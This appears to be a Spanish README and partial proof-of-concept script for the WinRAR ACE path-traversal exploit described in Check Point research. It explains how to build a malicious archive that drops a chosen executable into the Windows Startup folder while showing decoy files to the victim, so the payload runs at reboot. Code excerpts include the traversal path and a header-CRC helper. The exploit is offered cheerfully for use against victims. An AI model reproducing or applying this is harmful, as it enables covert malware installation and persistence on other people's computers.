
exploit para https://research.checkpoint.com/extracting-code-execution-from-winrar
exp para Extraer Ejecución de Código de Winrar
poc por Ridter
¿cómo usarlo?
solo necesitas instalar Python 3.7 y preparar un archivo malicioso que quieras ejecutar, establecer los valores que desees, ¡este script exp generará el archivo malicioso automáticamente!
... ...
# El nombre del archivo comprimido deseado
rar_filename = "test.rar"
# El archivo malicioso que quieres ejecutar
evil_filename = "calc.exe"
# La ruta de descompresión deseada, como se muestra a continuación
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Otros archivos que se mostrarán cuando la víctima abra el winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]
... ...
def get_right_hdr_crc(filename):
# Este comando puede ser diferente, depende del entorno Python3.
p = os.popen('py -3 acefile.py --headers %s'%(filename))
res = p.read()
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
result = pattern.findall(res)
right_hdr_crc = result[0].upper()
return hex2raw4(right_hdr_crc)
... ...
ejecuta el exp, este generará test.rar automáticamente
si la víctima abre test.rar, verá los archivos hello.txt y world.txt, puedes añadir más archivos, más atractivos.
![]()
hi.exe, que en realidad es calc.exe. cuando reinicie el ordenador, hi.exe se ejecutará.![]()
¡disfruta! :)